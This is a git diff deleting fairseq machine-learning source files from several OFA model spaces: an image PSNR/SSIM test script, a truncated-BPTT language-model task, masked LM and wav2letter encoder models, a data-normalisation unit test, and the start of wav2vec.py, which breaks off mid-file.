print(f'\tNumpy\tPSNR: {psnr:.6f} dB, \tSSIM: {ssim:.6f}') - - # --------------------- PyTorch (CPU) --------------------- - img = img2tensor(img / 255., bgr2rgb=True, float32=True).unsqueeze_(0) - img2 = img2tensor(img2 / 255., bgr2rgb=True, float32=True).unsqueeze_(0) - - psnr_pth = calculate_psnr_pt(img, img2, crop_border=crop_border, test_y_channel=test_y_channel) - ssim_pth = calculate_ssim_pt(img, img2, crop_border=crop_border, test_y_channel=test_y_channel) - print(f'\tTensor (CPU) \tPSNR: {psnr_pth[0]:.6f} dB, \tSSIM: {ssim_pth[0]:.6f}') - - # --------------------- PyTorch (GPU) --------------------- - img = img.cuda() - img2 = img2.cuda() - psnr_pth = calculate_psnr_pt(img, img2, crop_border=crop_border, test_y_channel=test_y_channel) - ssim_pth = calculate_ssim_pt(img, img2, crop_border=crop_border, test_y_channel=test_y_channel) - print(f'\tTensor (GPU) \tPSNR: {psnr_pth[0]:.6f} dB, \tSSIM: {ssim_pth[0]:.6f}') - - psnr_pth = calculate_psnr_pt( - torch.repeat_interleave(img, 2, dim=0), - torch.repeat_interleave(img2, 2, dim=0), - crop_border=crop_border, - test_y_channel=test_y_channel) - ssim_pth = calculate_ssim_pt( - torch.repeat_interleave(img, 2, dim=0), - torch.repeat_interleave(img2, 2, dim=0), - crop_border=crop_border, - test_y_channel=test_y_channel) - print(f'\tTensor (GPU batch) \tPSNR: {psnr_pth[0]:.6f}, {psnr_pth[1]:.6f} dB,' - f'\tSSIM: {ssim_pth[0]:.6f}, {ssim_pth[1]:.6f}') - - -if __name__ == '__main__': - test('tests/data/bic/baboon.png', 'tests/data/gt/baboon.png', crop_border=4, test_y_channel=False) - test('tests/data/bic/baboon.png', 'tests/data/gt/baboon.png', crop_border=4, test_y_channel=True) - - test('tests/data/bic/comic.png', 'tests/data/gt/comic.png', crop_border=4, test_y_channel=False) - test('tests/data/bic/comic.png', 'tests/data/gt/comic.png', crop_border=4, test_y_channel=True) diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/truncated_bptt/truncated_bptt_lm_task.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/truncated_bptt/truncated_bptt_lm_task.py deleted file mode 100644 index 02be0e7fb4213b98798c85b79e9046e9990b97fc..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/examples/truncated_bptt/truncated_bptt_lm_task.py +++ /dev/null @@ -1,281 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import os -from dataclasses import dataclass, field -from typing import List, Optional, Tuple - -import torch -from fairseq import utils -from fairseq.data import ( - Dictionary, - TokenBlockDataset, - data_utils, - iterators, -) -from fairseq.dataclass import FairseqDataclass -from fairseq.distributed import utils as dist_utils -from fairseq.tasks import FairseqTask, register_task -from omegaconf import II - - -logger = logging.getLogger(__name__) - - -@dataclass -class TruncatedBPTTLMConfig(FairseqDataclass): - data: str = field(default="???", metadata={"help": "path to data directory"}) - tokens_per_sample: int = field( - default=1024, - metadata={"help": "max number of tokens per sequence"}, - ) - batch_size: int = II("dataset.batch_size") - # Some models use *max_target_positions* to know how many positional - # embeddings to learn. We use II(...) to make it default to - # *tokens_per_sample*, but in principle there could be more positional - # embeddings than tokens in a single batch. This may also be irrelevant for - # custom model implementations. - max_target_positions: int = II("task.tokens_per_sample") - # these will be populated automatically if not provided - data_parallel_rank: Optional[int] = None - data_parallel_size: Optional[int] = None - - -@register_task("truncated_bptt_lm", dataclass=TruncatedBPTTLMConfig) -class TruncatedBPTTLMTask(FairseqTask): - def __init__(self, cfg: TruncatedBPTTLMConfig): - super().__init__(cfg) - - if cfg.data_parallel_rank is None or cfg.data_parallel_size is None: - if torch.distributed.is_initialized(): - cfg.data_parallel_rank = dist_utils.get_data_parallel_rank() - cfg.data_parallel_size = dist_utils.get_data_parallel_world_size() - else: - cfg.data_parallel_rank = 0 - cfg.data_parallel_size = 1 - - # load the dictionary - paths = utils.split_paths(cfg.data) - assert len(paths) > 0 - self.dictionary = Dictionary.load(os.path.join(paths[0], "dict.txt")) - logger.info("dictionary: {} types".format(len(self.dictionary))) - - def load_dataset(self, split, epoch=1, combine=False, **kwargs): - """Load a given dataset split (e.g., train, valid, test)""" - - # support sharded datasets - paths = utils.split_paths(self.cfg.data) - assert len(paths) > 0 - data_path = paths[(epoch - 1) % len(paths)] - split_path = os.path.join(data_path, split) - - # each element of *data* will be a tensorized line from the original - # text dataset, similar to ``open(split_path).readlines()`` - data = data_utils.load_indexed_dataset( - split_path, self.dictionary, combine=combine - ) - if data is None: - raise FileNotFoundError( - "Dataset not found: {} ({})".format(split, split_path) - ) - - # this is similar to ``data.view(-1).split(tokens_per_sample)`` - data = TokenBlockDataset( - data, - data.sizes, - block_size=self.cfg.tokens_per_sample, - pad=None, # unused - eos=None, # unused - break_mode="none", - ) - - self.datasets[split] = TruncatedBPTTDataset( - data=data, - bsz_per_shard=self.cfg.batch_size, - shard_id=self.cfg.data_parallel_rank, - num_shards=self.cfg.data_parallel_size, - ) - - def dataset(self, split): - return self.datasets[split] - - def get_batch_iterator( - self, dataset, num_workers=0, epoch=1, data_buffer_size=0, **kwargs - ): - return iterators.EpochBatchIterator( - dataset=dataset, - collate_fn=self._collate_fn, - num_workers=num_workers, - epoch=epoch, - buffer_size=data_buffer_size, - # we don't use the batching functionality from EpochBatchIterator; - # instead every item in *dataset* is a whole batch - batch_sampler=[[i] for i in range(len(dataset))], - disable_shuffling=True, - ) - - def _collate_fn(self, items: List[List[torch.Tensor]]): - # we don't use fairseq's batching functionality, so we expect a single - # Tensor of type List[torch.Tensor] - assert len(items) == 1 - - # item will have shape B x T (the last batch may have length < T) - id, item = items[0] - item = data_utils.collate_tokens(item, pad_idx=self.source_dictionary.pad()) - B, T = item.size() - - # shift item one position over and append a padding token for the target - target = torch.nn.functional.pad( - item[:, 1:], (0, 1, 0, 0), value=self.target_dictionary.pad() - ) - - # fairseq expects batches to have the following structure - return { - "id": torch.tensor([id]*item.size(0)), - "net_input": { - "src_tokens": item, - }, - "target": target, - "nsentences": item.size(0), - "ntokens": item.numel(), - } - - def build_dataset_for_inference( - self, src_tokens: List[torch.Tensor], src_lengths: List[int], **kwargs - ) -> torch.utils.data.Dataset: - eos = self.source_dictionary.eos() - dataset = TokenBlockDataset( - src_tokens, - src_lengths, - block_size=None, # ignored for "eos" break mode - pad=self.source_dictionary.pad(), - eos=eos, - break_mode="eos", - ) - - class Dataset(torch.utils.data.Dataset): - def __getitem__(self, i): - item = dataset[i] - if item[-1] == eos: - # remove eos to support generating with a prefix - item = item[:-1] - return (i, [item]) - - def __len__(self): - return len(dataset) - - return Dataset() - - def inference_step( - self, generator, models, sample, prefix_tokens=None, constraints=None - ): - with torch.no_grad(): - if constraints is not None: - raise NotImplementedError - - # SequenceGenerator doesn't use *src_tokens* directly, we need to - # pass the *prefix_tokens* argument instead. - if prefix_tokens is None and sample["net_input"]["src_tokens"].nelement(): - prefix_tokens = sample["net_input"]["src_tokens"] - - # begin generation with the end-of-sentence token - bos_token = self.source_dictionary.eos() - - return generator.generate( - models, sample, prefix_tokens=prefix_tokens, bos_token=bos_token - ) - - def eval_lm_dataloader( - self, - dataset, - max_tokens: Optional[int] = 36000, - batch_size: Optional[int] = None, - max_positions: Optional[int] = None, - num_shards: int = 1, - shard_id: int = 0, - num_workers: int = 1, - data_buffer_size: int = 10, - context_window: int = 0, - ): - if context_window > 0: - raise NotImplementedError( - "Transformer-XL doesn't need --context-window, try " - "--model-overrides '{\"mem_len\":42}' instead " - ) - return self.get_batch_iterator( - dataset=dataset, - max_tokens=max_tokens, - max_sentences=batch_size, - max_positions=max_positions, - ignore_invalid_inputs=True, - num_shards=num_shards, - shard_id=shard_id, - num_workers=num_workers, - data_buffer_size=data_buffer_size, - ).next_epoch_itr(shuffle=False) - - @property - def source_dictionary(self): - return self.dictionary - - @property - def target_dictionary(self): - return self.dictionary - - -class TruncatedBPTTDataset(torch.utils.data.Dataset): - def __init__( - self, - data: List[torch.Tensor], # ordered list of items - bsz_per_shard, # number of items processed per GPUs per forward - shard_id, # current GPU ID - num_shards, # number of GPUs - ): - super().__init__() - self.data = data - - def batchify(data, bsz): - # Work out how cleanly we can divide the dataset into bsz parts. - nbatch = data.size(0) // bsz - # Trim off any extra elements that wouldn't cleanly fit (remainders). - data = data.narrow(0, 0, nbatch * bsz) - # Evenly divide the data across the bsz batches. - data = data.view(bsz, -1).contiguous() - return data - - # total number of sequences processed by all GPUs in each forward pass - global_batch_size = bsz_per_shard * num_shards - - """ - With a 16 item dataset, bsz_per_shard=2 and num_shards=3, - *indices* might look like: - - indices = [[0, 1], - [2, 3], - [4, 5], - [6, 7], - [8, 9], - [10, 11]] - - The size of the TruncatedBPTTDataset instance will be 2, - and shard 1 will see items: - - [(0, [data[4], data[6]]), - (1, [data[5], data[7]])] - """ - indices = batchify(torch.arange(len(data)), global_batch_size) - assert indices.size(0) == global_batch_size - - self.my_indices = indices[ - shard_id * bsz_per_shard : (shard_id + 1) * bsz_per_shard - ] - assert self.my_indices.size(0) == bsz_per_shard - - def __len__(self): - return self.my_indices.size(1) - - def __getitem__(self, i) -> Tuple[int, List[torch.Tensor]]: - return (i, [self.data[idx] for idx in self.my_indices[:, i]]) diff --git a/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/__init__.py b/spaces/OFA-Sys/OFA-Generic_Interface/fairseq/tests/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/masked_lm.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/masked_lm.py deleted file mode 100644 index 5cb49dd77cc3514e6c1383c4286e90979f6edb34..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/models/masked_lm.py +++ /dev/null @@ -1,404 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq import utils -from fairseq.models import ( - FairseqEncoder, - FairseqEncoderModel, - register_model, - register_model_architecture, -) -from fairseq.modules import ( - LayerNorm, - SinusoidalPositionalEmbedding, - TransformerSentenceEncoder, -) -from fairseq.modules.transformer_sentence_encoder import init_bert_params -from fairseq.utils import safe_hasattr - - -logger = logging.getLogger(__name__) - - -@register_model("masked_lm") -class MaskedLMModel(FairseqEncoderModel): - """ - Class for training a Masked Language Model. It also supports an - additional sentence level prediction if the sent-loss argument is set. - """ - - def __init__(self, args, encoder): - super().__init__(encoder) - self.args = args - - # if specified then apply bert initialization on the model. We need - # to explictly call this to make sure that the output embeddings - # and projection layers are also correctly initialized - if getattr(args, "apply_bert_init", False): - self.apply(init_bert_params) - - @staticmethod - def add_args(parser): - """Add model-specific arguments to the parser.""" - # Arguments related to dropout - parser.add_argument( - "--dropout", type=float, metavar="D", help="dropout probability" - ) - parser.add_argument( - "--attention-dropout", - type=float, - metavar="D", - help="dropout probability for" " attention weights", - ) - parser.add_argument( - "--act-dropout", - type=float, - metavar="D", - help="dropout probability after" " activation in FFN", - ) - - # Arguments related to hidden states and self-attention - parser.add_argument( - "--encoder-ffn-embed-dim", - type=int, - metavar="N", - help="encoder embedding dimension for FFN", - ) - parser.add_argument( - "--encoder-layers", type=int, metavar="N", help="num encoder layers" - ) - parser.add_argument( - "--encoder-attention-heads", - type=int, - metavar="N", - help="num encoder attention heads", - ) - - # Arguments related to input and output embeddings - parser.add_argument( - "--encoder-embed-dim", - type=int, - metavar="N", - help="encoder embedding dimension", - ) - parser.add_argument( - "--share-encoder-input-output-embed", - action="store_true", - help="share encoder input" " and output embeddings", - ) - parser.add_argument( - "--encoder-learned-pos", - action="store_true", - help="use learned positional embeddings in the encoder", - ) - parser.add_argument( - "--no-token-positional-embeddings", - action="store_true", - help="if set, disables positional embeddings" " (outside self attention)", - ) - parser.add_argument( - "--num-segment", type=int, metavar="N", help="num segment in the input" - ) - parser.add_argument( - "--max-positions", type=int, help="number of positional embeddings to learn" - ) - - # Arguments related to sentence level prediction - parser.add_argument( - "--sentence-class-num", - type=int, - metavar="N", - help="number of classes for sentence task", - ) - parser.add_argument( - "--sent-loss", - action="store_true", - help="if set," " calculate sentence level predictions", - ) - - # Arguments related to parameter initialization - parser.add_argument( - "--apply-bert-init", - action="store_true", - help="use custom param initialization for BERT", - ) - - # misc params - parser.add_argument( - "--activation-fn", - choices=utils.get_available_activation_fns(), - help="activation function to use", - ) - parser.add_argument( - "--pooler-activation-fn", - choices=utils.get_available_activation_fns(), - help="Which activation function to use for pooler layer.", - ) - parser.add_argument( - "--encoder-normalize-before", - action="store_true", - help="apply layernorm before each encoder block", - ) - - def forward(self, src_tokens, segment_labels=None, **kwargs): - return self.encoder(src_tokens, segment_labels=segment_labels, **kwargs) - - def max_positions(self): - return self.encoder.max_positions - - @classmethod - def build_model(cls, args, task): - """Build a new model instance.""" - # make sure all arguments are present in older models - base_architecture(args) - - if not safe_hasattr(args, "max_positions"): - args.max_positions = args.tokens_per_sample - - logger.info(args) - - encoder = MaskedLMEncoder(args, task.dictionary) - return cls(args, encoder) - - -class MaskedLMEncoder(FairseqEncoder): - """ - Encoder for Masked Language Modelling. - """ - - def __init__(self, args, dictionary): - super().__init__(dictionary) - - self.padding_idx = dictionary.pad() - self.vocab_size = dictionary.__len__() - self.max_positions = args.max_positions - - self.sentence_encoder = TransformerSentenceEncoder( - padding_idx=self.padding_idx, - vocab_size=self.vocab_size, - num_encoder_layers=args.encoder_layers, - embedding_dim=args.encoder_embed_dim, - ffn_embedding_dim=args.encoder_ffn_embed_dim, - num_attention_heads=args.encoder_attention_heads, - dropout=args.dropout, - attention_dropout=args.attention_dropout, - activation_dropout=args.act_dropout, - max_seq_len=self.max_positions, - num_segments=args.num_segment, - use_position_embeddings=not args.no_token_positional_embeddings, - encoder_normalize_before=args.encoder_normalize_before, - apply_bert_init=args.apply_bert_init, - activation_fn=args.activation_fn, - learned_pos_embedding=args.encoder_learned_pos, - ) - - self.share_input_output_embed = args.share_encoder_input_output_embed - self.embed_out = None - self.sentence_projection_layer = None - self.sentence_out_dim = args.sentence_class_num - self.lm_output_learned_bias = None - - # Remove head is set to true during fine-tuning - self.load_softmax = not getattr(args, "remove_head", False) - - self.masked_lm_pooler = nn.Linear( - args.encoder_embed_dim, args.encoder_embed_dim - ) - self.pooler_activation = utils.get_activation_fn(args.pooler_activation_fn) - - self.lm_head_transform_weight = nn.Linear( - args.encoder_embed_dim, args.encoder_embed_dim - ) - self.activation_fn = utils.get_activation_fn(args.activation_fn) - self.layer_norm = LayerNorm(args.encoder_embed_dim) - - self.lm_output_learned_bias = None - if self.load_softmax: - self.lm_output_learned_bias = nn.Parameter(torch.zeros(self.vocab_size)) - - if not self.share_input_output_embed: - self.embed_out = nn.Linear( - args.encoder_embed_dim, self.vocab_size, bias=False - ) - - if args.sent_loss: - self.sentence_projection_layer = nn.Linear( - args.encoder_embed_dim, self.sentence_out_dim, bias=False - ) - - def forward(self, src_tokens, segment_labels=None, masked_tokens=None, **unused): - """ - Forward pass for Masked LM encoder. This first computes the token - embedding using the token embedding matrix, position embeddings (if - specified) and segment embeddings (if specified). - - Here we assume that the sentence representation corresponds to the - output of the classification_token (see bert_task or cross_lingual_lm - task for more details). - Args: - - src_tokens: B x T matrix representing sentences - - segment_labels: B x T matrix representing segment label for tokens - Returns: - - a tuple of the following: - - logits for predictions in format B x T x C to be used in - softmax afterwards - - a dictionary of additional data, where 'pooled_output' contains - the representation for classification_token and 'inner_states' - is a list of internal model states used to compute the - predictions (similar in ELMO). 'sentence_logits' - is the prediction logit for NSP task and is only computed if - this is specified in the input arguments. - """ - - inner_states, sentence_rep = self.sentence_encoder( - src_tokens, - segment_labels=segment_labels, - ) - - x = inner_states[-1].transpose(0, 1) - # project masked tokens only - if masked_tokens is not None: - x = x[masked_tokens, :] - x = self.layer_norm(self.activation_fn(self.lm_head_transform_weight(x))) - - pooled_output = self.pooler_activation(self.masked_lm_pooler(sentence_rep)) - - # project back to size of vocabulary - if self.share_input_output_embed and hasattr( - self.sentence_encoder.embed_tokens, "weight" - ): - x = F.linear(x, self.sentence_encoder.embed_tokens.weight) - elif self.embed_out is not None: - x = self.embed_out(x) - if self.lm_output_learned_bias is not None: - x = x + self.lm_output_learned_bias - sentence_logits = None - if self.sentence_projection_layer: - sentence_logits = self.sentence_projection_layer(pooled_output) - - return x, { - "inner_states": inner_states, - "pooled_output": pooled_output, - "sentence_logits": sentence_logits, - } - - def max_positions(self): - """Maximum output length supported by the encoder.""" - return self.max_positions - - def upgrade_state_dict_named(self, state_dict, name): - if isinstance( - self.sentence_encoder.embed_positions, SinusoidalPositionalEmbedding - ): - state_dict[ - name + ".sentence_encoder.embed_positions._float_tensor" - ] = torch.FloatTensor(1) - if not self.load_softmax: - for k in list(state_dict.keys()): - if ( - "embed_out.weight" in k - or "sentence_projection_layer.weight" in k - or "lm_output_learned_bias" in k - ): - del state_dict[k] - return state_dict - - -@register_model_architecture("masked_lm", "masked_lm") -def base_architecture(args): - args.dropout = getattr(args, "dropout", 0.1) - args.attention_dropout = getattr(args, "attention_dropout", 0.1) - args.act_dropout = getattr(args, "act_dropout", 0.0) - - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 4096) - args.encoder_layers = getattr(args, "encoder_layers", 6) - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 8) - - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 1024) - args.share_encoder_input_output_embed = getattr( - args, "share_encoder_input_output_embed", False - ) - args.encoder_learned_pos = getattr(args, "encoder_learned_pos", False) - args.no_token_positional_embeddings = getattr( - args, "no_token_positional_embeddings", False - ) - args.num_segment = getattr(args, "num_segment", 2) - - args.sentence_class_num = getattr(args, "sentence_class_num", 2) - args.sent_loss = getattr(args, "sent_loss", False) - - args.apply_bert_init = getattr(args, "apply_bert_init", False) - - args.activation_fn = getattr(args, "activation_fn", "relu") - args.pooler_activation_fn = getattr(args, "pooler_activation_fn", "tanh") - args.encoder_normalize_before = getattr(args, "encoder_normalize_before", False) - - -@register_model_architecture("masked_lm", "bert_base") -def bert_base_architecture(args): - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 768) - args.share_encoder_input_output_embed = getattr( - args, "share_encoder_input_output_embed", True - ) - args.no_token_positional_embeddings = getattr( - args, "no_token_positional_embeddings", False - ) - args.encoder_learned_pos = getattr(args, "encoder_learned_pos", True) - args.num_segment = getattr(args, "num_segment", 2) - - args.encoder_layers = getattr(args, "encoder_layers", 12) - - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 12) - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 3072) - - args.sentence_class_num = getattr(args, "sentence_class_num", 2) - args.sent_loss = getattr(args, "sent_loss", True) - - args.apply_bert_init = getattr(args, "apply_bert_init", True) - - args.activation_fn = getattr(args, "activation_fn", "gelu") - args.pooler_activation_fn = getattr(args, "pooler_activation_fn", "tanh") - args.encoder_normalize_before = getattr(args, "encoder_normalize_before", True) - base_architecture(args) - - -@register_model_architecture("masked_lm", "bert_large") -def bert_large_architecture(args): - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 1024) - args.encoder_layers = getattr(args, "encoder_layers", 24) - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 16) - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 4096) - bert_base_architecture(args) - - -@register_model_architecture("masked_lm", "xlm_base") -def xlm_architecture(args): - args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 1024) - args.share_encoder_input_output_embed = getattr( - args, "share_encoder_input_output_embed", True - ) - args.no_token_positional_embeddings = getattr( - args, "no_token_positional_embeddings", False - ) - args.encoder_learned_pos = getattr(args, "encoder_learned_pos", True) - args.num_segment = getattr(args, "num_segment", 1) - - args.encoder_layers = getattr(args, "encoder_layers", 6) - - args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 8) - args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 4096) - - args.sent_loss = getattr(args, "sent_loss", False) - - args.activation_fn = getattr(args, "activation_fn", "gelu") - args.encoder_normalize_before = getattr(args, "encoder_normalize_before", False) - args.pooler_activation_fn = getattr(args, "pooler_activation_fn", "tanh") - args.apply_bert_init = getattr(args, "apply_bert_init", True) - base_architecture(args) diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/speech_recognition/test_data_utils.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/speech_recognition/test_data_utils.py deleted file mode 100644 index a72e0b66948da1349d87eafdef4c4004dd535c96..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/tests/speech_recognition/test_data_utils.py +++ /dev/null @@ -1,62 +0,0 @@ -#!/usr/bin/env python3 -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. -import unittest - -import torch -from examples.speech_recognition.data import data_utils - - -class DataUtilsTest(unittest.TestCase): - def test_normalization(self): - sample_len1 = torch.tensor( - [ - [ - -0.7661, - -1.3889, - -2.0972, - -0.9134, - -0.7071, - -0.9765, - -0.8700, - -0.8283, - 0.7512, - 1.3211, - 2.1532, - 2.1174, - 1.2800, - 1.2633, - 1.6147, - 1.6322, - 2.0723, - 3.1522, - 3.2852, - 2.2309, - 2.5569, - 2.2183, - 2.2862, - 1.5886, - 0.8773, - 0.8725, - 1.2662, - 0.9899, - 1.1069, - 1.3926, - 1.2795, - 1.1199, - 1.1477, - 1.2687, - 1.3843, - 1.1903, - 0.8355, - 1.1367, - 1.2639, - 1.4707, - ] - ] - ) - out = data_utils.apply_mv_norm(sample_len1) - assert not torch.isnan(out).any() - assert (out == sample_len1).all() diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_recognition/models/w2l_conv_glu_enc.py b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_recognition/models/w2l_conv_glu_enc.py deleted file mode 100644 index 655a9b0d19d11e35511392a016f9d6b7d7aa2925..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_recognition/models/w2l_conv_glu_enc.py +++ /dev/null @@ -1,177 +0,0 @@ -#!/usr/bin/env python3 - -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq.models import ( - FairseqEncoder, - FairseqEncoderModel, - register_model, - register_model_architecture, -) -from fairseq.modules.fairseq_dropout import FairseqDropout - - -default_conv_enc_config = """[ - (400, 13, 170, 0.2), - (440, 14, 0, 0.214), - (484, 15, 0, 0.22898), - (532, 16, 0, 0.2450086), - (584, 17, 0, 0.262159202), - (642, 18, 0, 0.28051034614), - (706, 19, 0, 0.30014607037), - (776, 20, 0, 0.321156295296), - (852, 21, 0, 0.343637235966), - (936, 22, 0, 0.367691842484), - (1028, 23, 0, 0.393430271458), - (1130, 24, 0, 0.42097039046), - (1242, 25, 0, 0.450438317792), - (1366, 26, 0, 0.481969000038), - (1502, 27, 0, 0.51570683004), - (1652, 28, 0, 0.551806308143), - (1816, 29, 0, 0.590432749713), -]""" - - -@register_model("asr_w2l_conv_glu_encoder") -class W2lConvGluEncoderModel(FairseqEncoderModel): - def __init__(self, encoder): - super().__init__(encoder) - - @staticmethod - def add_args(parser): - """Add model-specific arguments to the parser.""" - parser.add_argument( - "--input-feat-per-channel", - type=int, - metavar="N", - help="encoder input dimension per input channel", - ) - parser.add_argument( - "--in-channels", - type=int, - metavar="N", - help="number of encoder input channels", - ) - parser.add_argument( - "--conv-enc-config", - type=str, - metavar="EXPR", - help=""" - an array of tuples each containing the configuration of one conv layer - [(out_channels, kernel_size, padding, dropout), ...] - """, - ) - - @classmethod - def build_model(cls, args, task): - """Build a new model instance.""" - conv_enc_config = getattr(args, "conv_enc_config", default_conv_enc_config) - encoder = W2lConvGluEncoder( - vocab_size=len(task.target_dictionary), - input_feat_per_channel=args.input_feat_per_channel, - in_channels=args.in_channels, - conv_enc_config=eval(conv_enc_config), - ) - return cls(encoder) - - def get_normalized_probs(self, net_output, log_probs, sample=None): - lprobs = super().get_normalized_probs(net_output, log_probs, sample) - lprobs.batch_first = False - return lprobs - - -class W2lConvGluEncoder(FairseqEncoder): - def __init__( - self, vocab_size, input_feat_per_channel, in_channels, conv_enc_config - ): - super().__init__(None) - - self.input_dim = input_feat_per_channel - if in_channels != 1: - raise ValueError("only 1 input channel is currently supported") - - self.conv_layers = nn.ModuleList() - self.linear_layers = nn.ModuleList() - self.dropouts = [] - cur_channels = input_feat_per_channel - - for out_channels, kernel_size, padding, dropout in conv_enc_config: - layer = nn.Conv1d(cur_channels, out_channels, kernel_size, padding=padding) - layer.weight.data.mul_(math.sqrt(3)) # match wav2letter init - self.conv_layers.append(nn.utils.weight_norm(layer)) - self.dropouts.append( - FairseqDropout(dropout, module_name=self.__class__.__name__) - ) - if out_channels % 2 != 0: - raise ValueError("odd # of out_channels is incompatible with GLU") - cur_channels = out_channels // 2 # halved by GLU - - for out_channels in [2 * cur_channels, vocab_size]: - layer = nn.Linear(cur_channels, out_channels) - layer.weight.data.mul_(math.sqrt(3)) - self.linear_layers.append(nn.utils.weight_norm(layer)) - cur_channels = out_channels // 2 - - def forward(self, src_tokens, src_lengths, **kwargs): - - """ - src_tokens: padded tensor (B, T, C * feat) - src_lengths: tensor of original lengths of input utterances (B,) - """ - B, T, _ = src_tokens.size() - x = src_tokens.transpose(1, 2).contiguous() # (B, feat, T) assuming C == 1 - - for layer_idx in range(len(self.conv_layers)): - x = self.conv_layers[layer_idx](x) - x = F.glu(x, dim=1) - x = self.dropouts[layer_idx](x) - - x = x.transpose(1, 2).contiguous() # (B, T, 908) - x = self.linear_layers[0](x) - x = F.glu(x, dim=2) - x = self.dropouts[-1](x) - x = self.linear_layers[1](x) - - assert x.size(0) == B - assert x.size(1) == T - - encoder_out = x.transpose(0, 1) # (T, B, vocab_size) - - # need to debug this -- find a simpler/elegant way in pytorch APIs - encoder_padding_mask = ( - torch.arange(T).view(1, T).expand(B, -1).to(x.device) - >= src_lengths.view(B, 1).expand(-1, T) - ).t() # (B x T) -> (T x B) - - return { - "encoder_out": encoder_out, # (T, B, vocab_size) - "encoder_padding_mask": encoder_padding_mask, # (T, B) - } - - def reorder_encoder_out(self, encoder_out, new_order): - encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select( - 1, new_order - ) - encoder_out["encoder_padding_mask"] = encoder_out[ - "encoder_padding_mask" - ].index_select(1, new_order) - return encoder_out - - def max_positions(self): - """Maximum input length supported by the encoder.""" - return (1e6, 1e6) # an arbitrary large number - - -@register_model_architecture("asr_w2l_conv_glu_encoder", "w2l_conv_glu_enc") -def w2l_conv_glu_enc(args): - args.input_feat_per_channel = getattr(args, "input_feat_per_channel", 80) - args.in_channels = getattr(args, "in_channels", 1) - args.conv_enc_config = getattr(args, "conv_enc_config", default_conv_enc_config) diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec.py deleted file mode 100644 index af6604da10f504baabff50bf14a6eb2214bffef3..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/wav2vec/wav2vec.py +++ /dev/null @@ -1,630 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from dataclasses import dataclass, field -import logging -import math -from typing import Optional, Tuple -from omegaconf import II -import sys - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq.dataclass import ChoiceEnum, FairseqDataclass -from fairseq.models import BaseFairseqModel, register_model -from fairseq.modules import ( - Fp32GroupNorm, - Fp32LayerNorm, - GumbelVectorQuantizer, - KmeansVectorQuantizer, - TransposeLast, -) -from fairseq.tasks import FairseqTask -from fairseq.utils import buffered_arange - - -logger = logging.getLogger(__name__) - - -AGGREGATOR_CHOICES = ChoiceEnum(["cnn", "gru"]) -PROJECT_FEATURES_CHOICES = ChoiceEnum(["none", "same", "new"]) -ACTIVATION_CHOICES = ChoiceEnum(["relu", "gelu"]) -VQ_TYPE_CHOICES = ChoiceEnum(["none", "gumbel", "kmeans"]) - - -@dataclass -class Wav2VecConfig(FairseqDataclass): - prediction_steps: int = field( - default=12, metadata={"help": "number of steps ahead to predict"} - ) - sample_distance: Optional[int] = field( - default=None, - metadata={ - "help": "sample distance from target. does not work properly with cross-sampling" - }, - ) - cross_sample_negatives: int = field( - default=0, metadata={"help": "num of cross sampled negatives"} - ) - num_negatives: int = field( - default=10, metadata={"help": "num of sampled negatives"} - ) - conv_feature_layers: str = field( - default="[(512, 10, 5), (512, 8, 4), (512, 4, 2), (512, 4, 2), (512, 4, 2), (512, 1, 1), (512, 1, 1), (512, 1, 1)]", - metadata={ - "help": "convolutional feature extraction layers [(dim, kernel_size, stride), ...]" - }, - ) - conv_aggregator_layers: str = field( - default="[(512, 2, 1), (512, 3, 1), (512, 4, 1), (512, 5, 1), (512, 6, 1), (512, 7, 1), (512, 8, 1), (512, 9, 1), (512, 10, 1), (512, 11, 1), (512, 12, 1), (512, 13, 1)]", - 